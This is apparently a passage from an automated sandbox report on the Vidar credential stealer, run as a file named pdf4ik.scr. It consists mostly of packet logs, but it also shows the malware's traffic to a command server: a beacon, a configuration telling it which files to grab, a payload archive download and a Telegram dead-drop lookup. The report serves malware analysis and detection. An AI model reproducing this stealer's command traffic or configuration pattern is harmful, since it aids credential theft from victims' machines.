                                      Mar 18, 2023 21:39:15.417598963 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417598963 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417623043 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417642117 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417650938 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417681932 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417700052 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417722940 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417762995 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417781115 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417803049 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417805910 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417805910 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417843103 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417865992 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417881966 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417885065 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417922020 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417928934 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.417963982 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.417965889 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418003082 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418008089 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418042898 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418056011 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418083906 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418093920 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418123960 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418143034 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418164968 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418169975 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418204069 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418225050 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418247938 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418255091 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418287992 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418313026 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418325901 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418329954 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418366909 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418392897 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418409109 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418411970 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418461084 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418472052 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418512106 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418519020 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418551922 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418555021 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418591976 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418598890 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418632030 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418638945 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418670893 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418683052 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418710947 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418716908 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418751001 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418776989 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418791056 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418797970 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418831110 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418845892 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418870926 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418875933 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418909073 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418926954 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418947935 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418951988 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.418987989 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.418998003 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419028044 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419049978 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419066906 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419068098 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419106007 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419116974 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419145107 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419157982 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419187069 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419194937 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419226885 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419231892 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419265032 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419287920 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419305086 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419306040 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419343948 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419362068 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419384956 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419392109 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419423103 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419440985 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419461966 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419469118 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419501066 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419527054 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419539928 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419544935 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419579983 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419586897 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419620991 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419634104 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419660091 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419668913 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419698954 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419706106 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419739008 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419763088 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419778109 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419789076 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419817924 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419845104 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419857025 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419868946 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419897079 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419914007 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419936895 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419939041 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.419976950 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.419987917 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420016050 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420026064 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420056105 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420064926 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420094967 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420114040 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420135021 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420145035 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420173883 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420186043 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420213938 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420221090 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420253992 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420269012 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420294046 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420301914 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420332909 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420342922 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420372963 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.420387030 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.420454025 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.421788931 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.421852112 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.681979895 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.682092905 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:15.937935114 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:15.938030005 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:16.441968918 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:16.446513891 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:17.304658890 CET8049705192.229.221.95192.168.2.3
                                      Mar 18, 2023 21:39:17.304827929 CET4970580192.168.2.3192.229.221.95
                                      Mar 18, 2023 21:39:17.401913881 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:17.402081966 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:19.289956093 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:19.290123940 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:19.614484072 CET4971980192.168.2.3192.229.221.95
                                      Mar 18, 2023 21:39:19.633569002 CET8049719192.229.221.95192.168.2.3
                                      Mar 18, 2023 21:39:19.633687019 CET4971980192.168.2.3192.229.221.95
                                      Mar 18, 2023 21:39:23.130028009 CET8049733116.203.13.130192.168.2.3
                                      Mar 18, 2023 21:39:23.132065058 CET4973380192.168.2.3116.203.13.130
                                      Mar 18, 2023 21:39:25.305980921 CET4973380192.168.2.3116.203.13.130
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Mar 18, 2023 21:39:14.341969967 CET | 50236 | 53 | 192.168.2.3 | 1.1.1.1
                                      Mar 18, 2023 21:39:14.359675884 CET | 53 | 50236 | 1.1.1.1 | 192.168.2.3
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Mar 18, 2023 21:39:14.341969967 CET | 192.168.2.3 | 1.1.1.1 | 0xff85 | Standard query (0) | t.me | A (IP address) | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Mar 18, 2023 21:39:14.359675884 CET | 1.1.1.1 | 192.168.2.3 | 0xff85 | No error (0) | t.me | | 149.154.167.99 | A (IP address) | IN (0x0001) | false
                                      • t.me
                                      • 116.203.13.130
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.3 | 49732 | 149.154.167.99 | 443 | C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
                                      Timestamp | kBytes transferred | Direction | Data


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      1 | 192.168.2.3 | 49733 | 116.203.13.130 | 80 | C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
                                      Timestamp | kBytes transferred | Direction | Data
                                      Mar 18, 2023 21:39:14.896399021 CET | 280 | OUT | GET / HTTP/1.1
                                      X-Id: 14ac9d852bc10b98f94de36f839b2f59
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                      Host: 116.203.13.130
                                      Mar 18, 2023 21:39:15.269294024 CET | 281 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sat, 18 Mar 2023 20:39:15 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Data Raw: 35 66 0d 0a 31 2c 31 2c 31 2c 31 2c 31 2c 31 38 38 36 38 63 62 63 64 31 37 36 61 65 61 33 33 63 31 66 32 64 38 34 65 38 39 38 31 30 36 62 2c 31 2c 31 2c 31 2c 31 2c 30 2c 44 65 66 61 75 6c 74 3b 25 52 45 43 45 4e 54 25 5c 3b 2a 2e 74 78 74 3b 35 30 3b 74 72 75 65 3b 2a 77 69 6e 64 6f 77 73 2a 3b 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 5f1,1,1,1,1,18868cbcd176aea33c1f2d84e898106b,1,1,1,1,0,Default;%RECENT%\;*.txt;50;true;*windows*;0
                                      Mar 18, 2023 21:39:15.273113966 CET | 281 | OUT | GET /edit.zip HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26/8mqLqMuL-37
                                      Host: 116.203.13.130
                                      Cache-Control: no-cache
                                      Mar 18, 2023 21:39:15.294917107 CET | 282 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sat, 18 Mar 2023 20:39:15 GMT
                                      Content-Type: application/zip
                                      Content-Length: 2685679
                                      Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
                                      Connection: keep-alive
                                      ETag: "631f30d3-28faef"
                                      Accept-Ranges: bytes
                                      Data Ascii: O6]'XeEtz0uAv[5PK6)645W.zdkFNpyuH!0GU'eGfR,W{Ps%##B=kda5sju,}bWdY M"<H[>mb%Tpbdy}D?f}8|](+m,tP/txYCA
                                      Mar 18, 2023 21:39:15.295161009 CET289INData Raw: cc 93 8e 07 8e 13 42 ab 5c 94 cf 3c 2b 54 7d 94 cf 90 10 4e 31 c7 89 54 db 61 e9 22 b3 1f 64 17 65 6a 27 34 a2 92 57 38 a8 b5 1e 04 44 00 1e 25 05 b8 d3 0b 0a e2 38 2c 75 b2 71 b1 7a 48 8f 7a cf 86 95 8a 76 15 b1 93 2b f1 c0 79 02 2c d0 ae b5 ec
                                      Data Ascii: B\<+T}N1Ta"dej'4W8D%8,uqzHzv+y,dAb~$EQ$V5#`AsMn|`]buU[;VO BQ@>~I";IP1(Y.t\<%Zk3g|yt3d"v~-CblIi
                                      Mar 18, 2023 21:39:15.295207977 CET291INData Raw: 9b db d8 43 9b 39 c1 47 f7 72 67 48 7a 0b 5a 6b 09 22 de 0e 4a 6d 52 63 9c bd c2 22 fb 88 d8 be d4 33 08 60 05 e8 dc 00 41 24 10 e9 66 d6 2e 56 a3 8d aa 11 6b c0 62 51 d1 68 4d bb d0 9a da 82 29 20 71 41 29 30 dd 9a 32 9b 5b b6 9e 50 f9 ea e7 7c
                                      Data Ascii: C9GrgHzZk"JmRc"3`A$f.VkbQhM) qA)02[P|r|iNxVEFHSFrSOP~yL):)=,L("0rkz}JG4(Tj*4qa9H020!:l;'Q%pR&ShbTZcL
                                      Mar 18, 2023 21:39:15.295258045 CET292INData Raw: 85 bb 15 cc 18 74 f0 e2 50 53 a5 4e 85 5e db 71 22 96 aa 50 0b 46 1b 7c 5a 9a e4 06 fb 12 ef ff 83 9c e6 23 84 04 d6 46 14 24 40 81 a0 b5 96 60 eb e6 28 6c b5 bb a5 06 c5 0f b4 a2 81 0d d2 08 8f 17 f3 b3 5e 36 44 bd 0f 0a 1e e6 b0 75 94 87 58 04
                                      Data Ascii: tPSN^q"PF|Z#F$@`(l^6DuX\lTJ.:1AXjA9rYuyfV ^),AU;X+-0l#ijA@\)R<S"8ZuCe9kdyv2{JUd.vH<gWX4Vi|.48MpPMF
                                      Mar 18, 2023 21:39:15.295305014 CET293INData Raw: 9b 78 da 8d b0 88 f3 2c 4a 3d 95 ea 43 e3 7a 1e f4 ae 9b 47 86 a8 87 3c 97 cd 21 ee 29 35 2d 14 e6 69 21 ad a5 6c 9a 71 ad 42 e3 5a 45 7a 15 b5 ac 4a c0 09 71 83 34 4a 63 2e 93 6c 88 14 2a c8 f3 58 dc b6 6e 50 6d eb b6 68 1e ab 11 4c 86 23 8c 7d
                                      Data Ascii: x,J=CzG<!)5-i!lqBZEzJq4Jc.l*XnPmhL#}Us*4MqH*5NLAIAy' \8-s:[E\W^{}Jp7W]JN+1bC6eUEHHt*,^[07+u~s**M*)!{<+D
                                      Mar 18, 2023 21:39:15.295351982 CET295INData Raw: 0e a0 f1 55 93 1a d1 e1 cd 90 30 15 17 c3 cb d6 32 69 48 b6 1f 80 00 c6 cf c5 f8 bc 9e 75 6a 4f 92 f7 39 b4 4c 9d 1a c6 a5 98 26 6d 41 64 d8 2c 8d aa fe ed 08 f7 6f dc f5 87 84 09 c5 fa b6 f2 74 e1 45 94 df 4b 1c d9 60 34 73 80 22 f9 3c 55 c0 72
                                      Data Ascii: U02iHujO9L&mAd,otEK`4s"<Urc'hV>MO&ygS#N!=4j0-m>[]*:TNiCHg'sO,p[%lU5u<MHqxV_A6iCQYH{qW*fD-^'E
                                      Mar 18, 2023 21:39:15.316714048 CET296INData Raw: c6 14 e5 d5 4a 53 f1 59 84 21 8c 78 47 a5 7a cc 20 e0 ec b5 a0 1e bb e9 bc 3e 06 2e f8 e0 89 a3 2f a5 95 4f 30 ec 44 11 1d a5 04 af 3a af 80 e3 59 c7 b1 68 28 ad cc 2b 60 ed c0 f9 ab 00 34 9a 69 c2 b1 b2 18 a4 8d 83 da 69 e9 2f 61 32 a5 3d 3e 99
                                      Data Ascii: JSY!xGz >./O0D:Yh(+`4ii/a2=>`.MBw$g\U%xEc*f*@18suB,7jcY7zXZ0oD;AKFLS5%kMZU\YQXM+P@I0_!/[_j+u/5{S #u1


                                      Session ID:0
                                      Source IP:192.168.2.3
                                      Source Port:49732
                                      Destination IP:149.154.167.99
                                      Destination Port:443
                                      Process:C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr

                                      Timestamp:2023-03-18 20:39:14 UTC
                                      kBytes transferred:0
                                      Direction:OUT
                                      Data:
                                      GET /zaskullz HTTP/1.1
                                      X-Id: 14ac9d852bc10b98f94de36f839b2f59
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
                                      Host: t.me

                                      Timestamp:2023-03-18 20:39:14 UTC
                                      kBytes transferred:0
                                      Direction:IN
                                      Data:
                                      HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Sat, 18 Mar 2023 20:39:14 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 12345
                                      Connection: close
                                      Set-Cookie: stel_ssid=673d21fff6847e4716_10876086883705630301; expires=Sun, 19 Mar 2023 20:39:14 GMT; path=/; samesite=None; secure; HttpOnly
                                      Pragma: no-cache
                                      Cache-control: no-store
                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                      Strict-Transport-Security: max-age=35768000

                                      Timestamp:2023-03-18 20:39:14 UTC
                                      kBytes transferred:0
                                      Direction:IN
                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @zaskullz</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pare



                                      Target ID:0
                                      Start time:21:37:36
                                      Start date:18/03/2023
                                      Path:C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE" /PIM NoEmail
                                      Imagebase:0x7ff66d000000
                                      File size:41778000 bytes
                                      MD5 hash:CA3FDE8329DE07C95897DB0D828545CD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:6
                                      Start time:21:37:38
                                      Start date:18/03/2023
                                      Path:C:\Windows\System32\OpenWith.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                      Imagebase:0x7ff666920000
                                      File size:119840 bytes
                                      MD5 hash:5D37A62943F1071FFFFE1DE74B8F2778
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:9
                                      Start time:21:37:49
                                      Start date:18/03/2023
                                      Path:C:\Program Files\7-Zip\7zG.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\pdf_novichki\" -spe -an -ai#7zMap2692:86:7zEvent4577
                                      Imagebase:0x310000
                                      File size:581632 bytes
                                      MD5 hash:04FB3AE7F05C8BC333125972BA907398
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Target ID:12
                                      Start time:21:39:09
                                      Start date:18/03/2023
                                      Path:C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr" /S
                                      Imagebase:0x400000
                                      File size:1153453336 bytes
                                      MD5 hash:BF481108AC0A54E82E5683ED8AE58CEB
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Avira
                                      Reputation:low

                                      Target ID:15
                                      Start time:21:39:15
                                      Start date:18/03/2023
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6916 -s 1968
                                      Imagebase:0x7e0000
                                      File size:452408 bytes
                                      MD5 hash:28D356B668C66115EA55135D24EEFB2C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate


                                        Execution Graph

                                        Execution Coverage:7.1%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:7.3%
                                        Total number of Nodes:1771
                                        Total number of Limit Nodes:52
calls 26761->26762 26763 29d821c7 26762->26763 26764 29d84750 17 API calls 26763->26764 26765 29d821e0 26764->26765 26766 29d84750 17 API calls 26765->26766 26767 29d821f9 26766->26767 26768 29d84750 17 API calls 26767->26768 26769 29d82212 26768->26769 26770 29d84750 17 API calls 26769->26770 26771 29d8222b 26770->26771 26772 29d84750 17 API calls 26771->26772 26773 29d82244 26772->26773 26774 29d84750 17 API calls 26773->26774 26775 29d8225d 26774->26775 26776 29d84750 17 API calls 26775->26776 26777 29d82276 26776->26777 26778 29d84750 17 API calls 26777->26778 26779 29d8228f 26778->26779 26780 29d84750 17 API calls 26779->26780 26781 29d822a8 26780->26781 26782 29d84750 17 API calls 26781->26782 26783 29d822c1 26782->26783 26784 29d84750 17 API calls 26783->26784 26785 29d822da 26784->26785 26786 29d84750 17 API calls 26785->26786 26787 29d822f3 26786->26787 26788 29d84750 17 API calls 26787->26788 26789 29d8230c 26788->26789 26790 29d84750 17 API calls 26789->26790 26791 29d82325 26790->26791 26792 29d84750 17 API calls 26791->26792 26793 29d8233e 26792->26793 26794 29d84750 17 API calls 26793->26794 26795 29d82357 26794->26795 26796 29d84750 17 API calls 26795->26796 26797 29d82370 26796->26797 26798 29d84750 17 API calls 26797->26798 26799 29d82389 26798->26799 26800 29d84750 17 API calls 26799->26800 26801 29d823a2 26800->26801 26802 29d84750 17 API calls 26801->26802 26803 29d823bb 26802->26803 26804 29d84750 17 API calls 26803->26804 26805 29d823d4 26804->26805 26806 29d84750 17 API calls 26805->26806 26807 29d823ed 26806->26807 26808 29d84750 17 API calls 26807->26808 26809 29d82406 26808->26809 26810 29d84750 17 API calls 26809->26810 26811 29d8241f 26810->26811 26812 29d84750 17 API calls 26811->26812 26813 29d82438 26812->26813 26814 29d84750 17 API calls 26813->26814 26815 29d82451 26814->26815 26816 29d84750 17 API calls 26815->26816 26817 29d8246a 26816->26817 26818 29d84750 17 API calls 26817->26818 26819 29d82483 26818->26819 26820 29d84750 17 
API calls 26819->26820 26821 29d8249c 26820->26821 26822 29d84750 17 API calls 26821->26822 26823 29d824b5 26822->26823 26824 29d84750 17 API calls 26823->26824 26825 29d824ce 26824->26825 26826 29d84750 17 API calls 26825->26826 26827 29d824e7 26826->26827 26828 29d84750 17 API calls 26827->26828 26829 29d82500 26828->26829 26830 29d84750 17 API calls 26829->26830 26831 29d82519 26830->26831 26832 29d84750 17 API calls 26831->26832 26833 29d82532 26832->26833 26834 29d84750 17 API calls 26833->26834 26835 29d8254b 26834->26835 26836 29d84750 17 API calls 26835->26836 26837 29d82564 26836->26837 26838 29d84750 17 API calls 26837->26838 26839 29d8257d 26838->26839 26840 29d84750 17 API calls 26839->26840 26841 29d82596 26840->26841 26842 29d84750 17 API calls 26841->26842 26843 29d825af 26842->26843 26844 29d84750 17 API calls 26843->26844 26845 29d825c8 26844->26845 26846 29d84750 17 API calls 26845->26846 26847 29d825e1 26846->26847 26848 29d84750 17 API calls 26847->26848 26849 29d825fa 26848->26849 26850 29d84750 17 API calls 26849->26850 26851 29d82613 26850->26851 26852 29d84750 17 API calls 26851->26852 26853 29d8262c 26852->26853 26854 29d84750 17 API calls 26853->26854 26855 29d82645 26854->26855 26856 29d84750 